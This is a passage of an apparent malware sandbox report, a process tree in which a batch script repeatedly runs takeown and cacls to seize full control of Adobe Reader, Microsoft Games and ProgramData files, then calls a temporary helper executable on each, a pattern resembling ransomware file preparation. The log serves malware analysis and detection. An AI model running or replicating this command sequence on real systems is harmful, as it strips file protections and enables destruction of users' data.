    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    - Modifies file permissions
    PID:1600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:1352
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
    3⤵
    PID:640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
    3⤵
    - Modifies file permissions
    PID:1496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "AdobePiStd.otf" -nobanner
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "AdobePiStd.otf" -nobanner
      4⤵
      PID:1944
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    - Modifies file permissions
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:1136
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:1996
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    PID:1236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:1664
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:1916
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    - Modifies file permissions
    PID:280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:1516
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:568
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  2⤵
  PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
    3⤵
    - Modifies file permissions
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "usa03.ths" -nobanner
    3⤵
    PID:836
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "usa03.ths" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:920
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:304
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:1096
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    PID:840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:1772
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  PID:1532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    - Modifies file permissions
    PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    PID:1136
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      PID:228
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    - Modifies file permissions
    PID:1848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      PID:1100
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  2⤵
  PID:1436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
    3⤵
    PID:840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
    3⤵
    - Modifies file permissions
    PID:1772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "distribute_form.gif" -nobanner
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "distribute_form.gif" -nobanner
      4⤵
      PID:212
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  2⤵
  PID:204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
    3⤵
    PID:228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "main.css" -nobanner
    3⤵
    PID:1136
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "main.css" -nobanner
      4⤵
      PID:1372
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  2⤵
  PID:564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
    3⤵
    PID:920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
    3⤵
    - Modifies file permissions
    PID:304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "review_shared.gif" -nobanner
    3⤵
    PID:1540
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "review_shared.gif" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1236
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""
  2⤵
  PID:1352
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"
    3⤵
    - Modifies file permissions
    PID:640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:964
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:1644
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""
  2⤵
  PID:976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C
    3⤵
    PID:836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
    3⤵
    PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
      4⤵
      PID:1332
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""
  2⤵
  PID:216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "MyriadPro-Regular.otf" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "MyriadPro-Regular.otf" -nobanner
      4⤵
      PID:1940
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""
  2⤵
  PID:1412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
      4⤵
      PID:220
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""
  2⤵
  PID:840
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "can03.ths" -nobanner
    3⤵
    PID:1136
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "can03.ths" -nobanner
      4⤵
      PID:204
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
    3⤵
    PID:1540
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
      4⤵
      PID:1712
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""
  2⤵
  PID:920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
    3⤵
    - Modifies file permissions
    PID:568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "ROMAN.TXT" -nobanner
    3⤵
    PID:964
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "ROMAN.TXT" -nobanner
      4⤵
      PID:1352
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"
    3⤵
    PID:708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CP1257.TXT" -nobanner
    3⤵
    PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CP1257.TXT" -nobanner
      4⤵
      PID:976
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "LogTransport2.exe" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "LogTransport2.exe" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:304
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:964
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:564
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    PID:976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:840
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:836
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:1236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "device.png" -nobanner
    3⤵
    PID:1232
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "device.png" -nobanner
      4⤵
      PID:1692
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:1204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:920
